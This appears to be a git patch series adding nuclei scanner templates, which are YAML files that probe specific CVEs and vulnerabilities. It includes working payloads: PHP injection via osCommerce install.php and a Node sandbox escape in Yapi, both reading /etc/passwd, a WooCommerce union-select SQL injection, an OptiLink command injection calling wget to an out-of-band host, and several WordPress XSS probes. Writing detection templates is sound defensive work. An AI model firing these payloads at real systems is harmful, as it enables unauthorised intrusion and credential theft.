CVE-2019-16525.yaml --- cves/2019/CVE-2019-16525.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2019/CVE-2019-16525.yaml diff --git a/cves/2019/CVE-2019-16525.yaml b/cves/2019/CVE-2019-16525.yaml new file mode 100644 index 0000000000..23b3cdac75 --- /dev/null +++ b/cves/2019/CVE-2019-16525.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-16525 + +info: + name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E%3C%2Fpath%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From e9b5b8fcebd099173bbed54dc277308d7f04124e Mon Sep 17 00:00:00 2001 From: Suman Kar Date: Thu, 15 Jul 2021 18:11:26 +0530 Subject: [PATCH 0669/4083] osCommerce 2.3.4.1 - Remote Code Execution --- ...ommerce-2.3.4.1-Remote-Code-Execution.yaml | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 vulnerabilities/oscommerce/oscommerce-2.3.4.1-Remote-Code-Execution.yaml diff --git a/vulnerabilities/oscommerce/oscommerce-2.3.4.1-Remote-Code-Execution.yaml b/vulnerabilities/oscommerce/oscommerce-2.3.4.1-Remote-Code-Execution.yaml new file mode 100644 index 0000000000..a1e83ca831 --- /dev/null +++ b/vulnerabilities/oscommerce/oscommerce-2.3.4.1-Remote-Code-Execution.yaml @@ -0,0 +1,40 @@ +id: oscommerce-2.3.4.1-Remote-Code-Execution + +info: + author: Suman_Kar + name: osCommerce 2.3.4.1 - Remote Code Execution + description: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php + reference: https://www.exploit-db.com/exploits/50128 + severity: high + tags: rce,oscommerce + +requests: + - raw: + - | + POST //install/install.php?step=4 HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 95 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Content-Type: application/x-www-form-urlencoded + + DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A + + - | + GET //install/includes/configure.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + + matchers-condition: and + matchers: + - type: word + words: + - 'root' + - type: status + status: + - 200 \ No newline at end of file From 9e7bf184b74bf88e4eaa1bd12a74544beca2d9f3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 15 Jul 2021 18:28:08 +0530 Subject: [PATCH 0670/4083] minor update --- ...emote-Code-Execution.yaml => oscommerce-rce.yaml} | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) rename vulnerabilities/oscommerce/{oscommerce-2.3.4.1-Remote-Code-Execution.yaml => oscommerce-rce.yaml} (84%) diff --git a/vulnerabilities/oscommerce/oscommerce-2.3.4.1-Remote-Code-Execution.yaml b/vulnerabilities/oscommerce/oscommerce-rce.yaml similarity index 84% rename from vulnerabilities/oscommerce/oscommerce-2.3.4.1-Remote-Code-Execution.yaml rename to vulnerabilities/oscommerce/oscommerce-rce.yaml index a1e83ca831..3e3c759fb9 100644 --- a/vulnerabilities/oscommerce/oscommerce-2.3.4.1-Remote-Code-Execution.yaml +++ b/vulnerabilities/oscommerce/oscommerce-rce.yaml @@ -11,7 +11,7 @@ info: requests: - raw: - | - POST //install/install.php?step=4 HTTP/1.1 + POST /install/install.php?step=4 HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: */* @@ -23,7 +23,7 @@ requests: DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A - | - GET //install/includes/configure.php HTTP/1.1 + GET /install/includes/configure.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Accept-Encoding: gzip, deflate @@ -32,9 +32,11 @@ requests: matchers-condition: and matchers: - - type: word - words: - - 'root' + - type: regex + regex: + - "root:[x*]:0:0:" + part: body + - type: status status: - 200 \ No newline at end of file From 6fcbe110648d0dfbb5c7e0d951fb9bba5069cd77 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 15 Jul 2021 18:29:24 +0530 Subject: [PATCH 0671/4083] Update oscommerce-rce.yaml --- vulnerabilities/oscommerce/oscommerce-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/oscommerce/oscommerce-rce.yaml b/vulnerabilities/oscommerce/oscommerce-rce.yaml index 3e3c759fb9..131e059877 100644 --- a/vulnerabilities/oscommerce/oscommerce-rce.yaml +++ b/vulnerabilities/oscommerce/oscommerce-rce.yaml @@ -1,4 +1,4 @@ -id: oscommerce-2.3.4.1-Remote-Code-Execution +id: oscommerce-rce info: author: Suman_Kar From dfe4814eb4a03d3fa073eede0eea05ca61e15456 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 15 Jul 2021 13:01:10 +0000 Subject: [PATCH 0672/4083] Auto Update README [Thu Jul 15 13:01:10 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ba1aca231a..7017cb0358 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 430 | vulnerabilities | 231 | exposed-panels | 200 | +| cves | 430 | vulnerabilities | 232 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1549 files**. +**128 directories, 1550 files**. From 642f71278da4bcfdbe03c7a437ab2071921da1e2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 15 Jul 2021 22:11:22 +0530 Subject: [PATCH 0673/4083] Added Yapi RCE --- vulnerabilities/other/yapi-rce.yaml | 110 ++++++++++++++++++++++++++++ 1 file changed, 110 insertions(+) create mode 100644 vulnerabilities/other/yapi-rce.yaml diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml new file mode 100644 index 0000000000..e7ad5c1b20 --- /dev/null +++ b/vulnerabilities/other/yapi-rce.yaml @@ -0,0 +1,110 @@ +id: yapi-rce + +info: + name: Yapi Remote Code Execution + author: pikpikcu + severity: critical + tags: yapi,rce + reference: | + - https://www.secpulse.com/archives/162502.html + - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b + - https://twitter.com/sec715/status/1415484190561161216 + - https://github.com/YMFE/yapi + +requests: + - raw: + - | # REQUEST 1 + POST /api/user/reg HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 94 + Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip + + {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} + + - | # REQUEST 2 + GET /api/group/list HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Type: application/json, text/plain, */* + Accept-Encoding: gzip + + - | # REQUEST 3 + POST /api/project/add HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 106 + Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip + + {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} + + - | # REQUEST 4 + GET /api/project/get?id={{project_id}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept-Encoding: gzip + + - | # REQUEST 5 + POST /api/interface/add HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 89 + Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip + + {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} + + - | # REQUEST 6 + POST /api/plugin/advmock/save HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 382 + Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip + + {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} + + - | # REQUEST 7 + GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept-Encoding: gzip + + cookie-reuse: true + extractors: + - type: regex + name: group_id + group: 1 + internal: true + part: body + regex: + - '"_id":([0-9]+),"group_name"' + + - type: regex + name: interface_id + group: 1 + internal: true + part: body + regex: + - '"req_body_form":\[\],"_id":([0-9]+)' + + - type: regex + name: project_id + group: 1 + internal: true + part: body + regex: + - '"tag":\[\],"_id":([0-9]+)' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + part: body + + - type: status + status: + - 200 From ede6df8fa4253c93aa04a619951592d3f8665e0b Mon Sep 17 00:00:00 2001 From: rootxharsh Date: Thu, 15 Jul 2021 17:02:19 +0000 Subject: [PATCH 0674/4083] Add WooCommerce SQLi Template --- .../wordpress/wordpress-woocommerce-sqli.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml new file mode 100644 index 0000000000..c1219606b5 --- /dev/null +++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml @@ -0,0 +1,23 @@ +id: wordpress-woocommerce-sqli + +info: + name: WordPress Woocommerce Plugin + author: @rootxharsh @iamnoooob @S1r1u5_ + severity: critical + tags: wordpress,woocomernce + + +requests: + - raw: + - | + GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1 + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 + - | + GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1 + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(tolower(all_headers), "application/json") && contains(body_1, "{\"term\":") || contains(body_2, "{\"term\":")' From 28278b45a259f0862d52dde84608509cc799ab0a Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 00:06:33 +0700 Subject: [PATCH 0675/4083] Create CVE-2019-16332.yaml --- cves/2019/CVE-2019-16332.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2019/CVE-2019-16332.yaml diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml new file mode 100644 index 0000000000..fa833c4377 --- /dev/null +++ b/cves/2019/CVE-2019-16332.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-16332 + +info: + name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From bf68e5060ddf745aaedc9c93f9198415f5ee8f8f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 00:09:33 +0700 Subject: [PATCH 0676/4083] Create CVE-2019-15713.yaml --- cves/2019/CVE-2019-15713.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2019/CVE-2019-15713.yaml diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml new file mode 100644 index 0000000000..405bd13a64 --- /dev/null +++ b/cves/2019/CVE-2019-15713.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-15713 + +info: + name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-15713 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 367f5d225dc52b458233fef0b3d5c0aec5918a0f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 00:12:52 +0700 Subject: [PATCH 0677/4083] Create CVE-2018-20462.yaml --- cves/2018/CVE-2018-20462.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2018/CVE-2018-20462.yaml diff --git a/cves/2018/CVE-2018-20462.yaml b/cves/2018/CVE-2018-20462.yaml new file mode 100644 index 0000000000..e136ee5786 --- /dev/null +++ b/cves/2018/CVE-2018-20462.yaml @@ -0,0 +1,29 @@ +id: CVE-2018-20462 + +info: + name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462 + tags: cve,cve2018,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 9d84281202c85d80bde71b2164cb05e503ba1a2c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 00:14:42 +0700 Subject: [PATCH 0678/4083] Create CVE-2018-11709.yaml --- cves/2018/CVE-2018-11709.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2018/CVE-2018-11709.yaml diff --git a/cves/2018/CVE-2018-11709.yaml b/cves/2018/CVE-2018-11709.yaml new file mode 100644 index 0000000000..e78227f474 --- /dev/null +++ b/cves/2018/CVE-2018-11709.yaml @@ -0,0 +1,29 @@ +id: CVE-2018-11709 + +info: + name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709 + tags: cve,cve2018,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 5bee8dd7160ecf11ddc9303c54eb123be7679c5c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 00:16:27 +0700 Subject: [PATCH 0679/4083] Create CVE-2018-5316.yaml --- cves/2018/CVE-2018-5316.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2018/CVE-2018-5316.yaml diff --git a/cves/2018/CVE-2018-5316.yaml b/cves/2018/CVE-2018-5316.yaml new file mode 100644 index 0000000000..7553a25625 --- /dev/null +++ b/cves/2018/CVE-2018-5316.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-5316 + +info: + name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316 + tags: cve,cve2018,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 382534fedc3d63b1b7dc90bebbed4de3f3de1767 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 15 Jul 2021 22:58:43 +0530 Subject: [PATCH 0680/4083] Update wordpress-woocommerce-sqli.yaml --- .../wordpress/wordpress-woocommerce-sqli.yaml | 34 ++++++++++++++----- 1 file changed, 25 insertions(+), 9 deletions(-) diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml index c1219606b5..d8a10190c6 100644 --- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml +++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml @@ -1,23 +1,39 @@ id: wordpress-woocommerce-sqli info: - name: WordPress Woocommerce Plugin - author: @rootxharsh @iamnoooob @S1r1u5_ + name: Unauthenticated SQL injection Woocommerce + author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan severity: critical - tags: wordpress,woocomernce + tags: wordpress,woocomernce,sqli + reference: | + - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 + - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx requests: - raw: - | GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1 - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 + {{Hostname}} + - | GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1 - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 + {{Hostname}} - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'contains(tolower(all_headers), "application/json") && contains(body_1, "{\"term\":") || contains(body_2, "{\"term\":")' + - type: word + words: + - '"term":' + - '"count":' + part: body + condition: and + + - type: word + words: + - 'application/json' + part: header + + - type: status + status: + - 200 \ No newline at end of file From 6d6c994dd570778817c2ac1b1c59f2f39b04db2c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 15 Jul 2021 17:37:10 +0000 Subject: [PATCH 0681/4083] Auto Update README [Thu Jul 15 17:37:10 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7017cb0358..b2ebc20708 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 430 | vulnerabilities | 232 | exposed-panels | 200 | +| cves | 430 | vulnerabilities | 233 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1550 files**. +**128 directories, 1551 files**. From 6bf13454aef603f4c4f28900e1e96edab43437a8 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 15 Jul 2021 23:15:22 +0530 Subject: [PATCH 0682/4083] Update optiLink-ont1gew-gpon-rce.yaml --- vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml index 799426dc22..055c33da1e 100644 --- a/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml +++ b/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml @@ -1,4 +1,4 @@ -id: optiLink-ont1gew-gpon-rce +id: optilink-ont1gew-gpon-rce info: name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution @@ -25,7 +25,7 @@ requests: User: e8c Password: e8c User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 - + target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1" matchers: From 9286c79bc1db4360fee193d3daa3e82e46c5a773 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 15 Jul 2021 23:15:45 +0530 Subject: [PATCH 0683/4083] Rename optiLink-ont1gew-gpon-rce.yaml to optilink-ont1gew-gpon-rce.yaml --- ...iLink-ont1gew-gpon-rce.yaml => optilink-ont1gew-gpon-rce.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/other/{optiLink-ont1gew-gpon-rce.yaml => optilink-ont1gew-gpon-rce.yaml} (100%) diff --git a/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml similarity index 100% rename from vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml rename to vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml From 9b7a57bf15d3951f41b2c56cc8689130dc17d69a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 23:35:02 +0530 Subject: [PATCH 0684/4083] Update wordpress-woocommerce-sqli.yaml --- vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml index d8a10190c6..4ced1b411e 100644 --- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml +++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml @@ -4,7 +4,7 @@ info: name: Unauthenticated SQL injection Woocommerce author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan severity: critical - tags: wordpress,woocomernce,sqli + tags: wordpress,woocomernce,sqli,wp-plugin reference: | - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx @@ -36,4 +36,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 97dfd43f1e2462e558a0e53acbd8b9c784cd9c8d Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 15 Jul 2021 23:46:08 +0530 Subject: [PATCH 0685/4083] Added tag and removed unsafe --- cves/2020/CVE-2020-25506.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index 21a5709c95..18de468cad 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -8,7 +8,7 @@ info: reference: | - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - tags: cve,cve2020,dlink,rce + tags: cve,cve2020,dlink,rce,oob requests: - raw: @@ -28,7 +28,6 @@ requests: Accept: */* Connection: close - unsafe: true matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction From 94ae6ea0bfcbe28b23563b485efe9311a67d1b34 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 15 Jul 2021 23:47:05 +0530 Subject: [PATCH 0686/4083] Added tag --- cves/2020/CVE-2020-26919.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index fffb1e22e4..c658ea4e31 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml @@ -8,7 +8,7 @@ info: reference: | - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - tags: cve,cve2020,netgear,rce + tags: cve,cve2020,netgear,rce,oob requests: - raw: From 07db6737e5d1a4bf69f2a8b48d60036b891a4293 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Fri, 16 Jul 2021 00:08:42 +0530 Subject: [PATCH 0687/4083] Update wordpress-woocommerce-sqli.yaml --- .../wordpress/wordpress-woocommerce-sqli.yaml | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml index 4ced1b411e..6f9e37b828 100644 --- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml +++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml @@ -2,7 +2,7 @@ id: wordpress-woocommerce-sqli info: name: Unauthenticated SQL injection Woocommerce - author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan + author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot severity: critical tags: wordpress,woocomernce,sqli,wp-plugin reference: | @@ -13,18 +13,14 @@ info: requests: - raw: - | - GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1 - {{Hostname}} - - - | - GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1 + GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522nuclei-pdteam%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1 {{Hostname}} matchers-condition: and matchers: - type: word words: - - '"term":' + - 'nuclei-pdteam' - '"count":' part: body condition: and From 6d27a6fe8ec40292359922bac83c4e873c9eb4fb Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 16 Jul 2021 00:34:38 +0530 Subject: [PATCH 0688/4083] payload update --- .../wordpress/wordpress-woocommerce-sqli.yaml | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml index 6f9e37b828..6b2f2e9a82 100644 --- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml +++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml @@ -9,20 +9,18 @@ info: - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx - requests: - - raw: - - | - GET 